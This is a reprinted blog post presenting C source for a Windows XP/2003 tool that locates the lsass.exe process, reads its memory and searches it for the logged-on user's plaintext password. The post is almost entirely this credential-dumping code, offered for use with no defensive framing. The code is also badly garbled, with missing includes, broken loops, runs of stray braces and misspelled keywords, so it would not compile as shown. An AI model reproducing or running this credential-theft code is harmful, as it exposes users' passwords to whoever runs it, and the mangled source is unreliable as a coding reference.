Reprinted Kernet Eternal Kingdom - XP and 2003 LSASS process in the plain text password

Read memory data for the LSASS process under XP and 2003 with WinHEX, you can read the plain text password of the current login user.

Source Code:

// ******************************************************** ***************************************** // Version: v1.0 // CODER: Wineggdrop // Date Release: 12 / 15/2004 // Purpose: To Demonstrate Searching Logon User Password On 2003 Box, The Method // Used Is Pretty unwise, But This May Be The Only Way To Review The // Logon User's Password On Windows 2003.// Test PlatForm : Windows 2003 // Compiled ON: VC 6.0 // ********************************************** ******************************************* # include # include #include #define BaseAddress 0x002b5000 // The Base Memory Address To Search; The Password May Be Located Before The Address Or Far More From This Address, Which Causes The Result Unreliablechar Password [MAX_PATH] = {0}; // store the found password // function prototype declaration // -------------------------------- -------------------------------------------------- -------------------- Bool Findpassword (DWORD PID); int search (char * buffer, const uint Nsize); DWORD getlssspid (); BOOL IS2003 (); // ----------------------------------- -------------------------------------------------- ----------------- // end of fucntion prototype declarationint main () {dWord PID = 0; Printf ("Windows 2003 Password Viewer v1.0 by Wineggdrop / N / N" ); If (! IS2003 ()) // Check Out if the Box is 2003 {printf ("The Program CAN't Only Run On Windows 2003 Platform / N"); Return -1;} PID = getlsasSPID (); / / Get the lsass.exe pid if (pid == 0) // Fail to get pid if returning zerom {return -1;} Findpassword (PID); // Find the password from lsass.exe memory returnograph;

} // end main () // ----------------------------------------- ------------------------------------------ // Purpose: Search The Memory & Try to get the password // Return Type: int // parameters: // in: char * buffer -> the memory buffer to search // out: const uint nsize -> The size of the memory buffer // Note : The Program Tries To Locate The Magic String "LocalSystem Remote Procedure", // Since The Password Is Near The Above Location, But It's Not Always True That // We Will Find The Magic String, Or Even We Find It, The Password May Be located // at some Other place.we Only Look for luck // ---------------------------------- -------------------------------------------------- INT Search (Char * Buffer, const uint nsize) {uint offset = 0; uint i = 0; uint j = 0; uint count = 0; if (buffer == null) {RETURN-1;} for (i = 0 ; i

Strlen ("Remote") 1; IF (& Buffer [I Offset], "Procedure", Strlen ("Procedure") == 0) {OFFSET = Strlen ("Procedure") 1; IF StrnicMP (& Buffer [i offset], "call", strlen ("call")) == 0) {i = offset; break;}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} {zeromeMory (Password, Sizeof (Password); for (; i 0) {Password [count ] = buffer [j];} else {breaf;}} Return i 7; // one flag to indeicate we find the password}} Return -1;

// Well, We Fail to Find the password, and this always happens}} // end search // ---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- ------ // purpose: to get the lsass.exe pid // return type: dword // parameters: none // -------------------- -------------------------------------------------- -------------- DWORD GetLsassPID () {HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE ) {printf ( "Fail To Create Snap Shot / n"); return 0;} pe32.dwSize = sizeof (PROCESSENTRY32); if (Process32First (hProcessSnap, & pe32!)) {CloseHandle (hProcessSnap); // Must clean up the Snapshot Object! Return 0; DO {IF (strcmpi (pe32.szexefile, "lsass.exe") == 0) {PID = pe32.th32processid; break;}} while (Process32Next (HProcessSnap, & PE32); c LoseHandle (HProcessSnap); Return PID;} // ---------------------------------- -------------------------------------------------- - // Purpose: to find the password // Return Type: Boolean // Parameters: // in: DWORD PID -> The lsass.exe's pid // ---------------- -------------------------------------------------- ------------------ Bool Findpassword (DWORD PID) {Handle HPROCESS = NULL; Char Buffer [5 * 1024] = {0}; DWORD BYTEGET = 0; int found = -1; HProcess = OpenProcess (Process_vm_read, false, pid); // open process if (hprocess == null) {printf ("

Fail to open process / n "); Return False;} f (! ReadprocessMemory (HProcess, (Pvoid) BaseEaddress, Buffer, 5 * 1024, & Byteget) // read the memory from lsass.exe {printf (" Fail to Readf) Memory / N "); CloseHandle (HProcess); Return False;} CloseHandle (HProcess); Found = Search (Buffer, Byteget); // Search the password if (Found> = 0) // We May Find the password {IF (strlen (password> 0) // Yes, We Find the password even we don't know ife {printf ("Found Password AT # 0x% x -> /"% s / "/ n ", Found Baseaddress, Password);}}} else {printf (" Fail to Find the Password / N ");} Return True;} // end Findpassword // ------------- -------------------------------------------------- --------------------- // Purpose: Check if The Box is Windows 2003 // Return Type: Boolean // Parameters: None // ----- -------------------------------------------------- --------------- -------------- BOOL Is2003 () {OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory (& osvi, sizeof (OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFOEX); if ((b0sVersionInfoEx =! GetversionEx (OsversionInfo *) & OSVI))) {osvi.dwosversioninfosize = sizeof (OsversionInfo);} return (Osvi.dwmajorversion == 5 && Osvi.dwminorversion == 2);} // end is2003 () // end of file Original source http://blog.9cbs.net/kernet/archive/2005/03/06/312715.aspx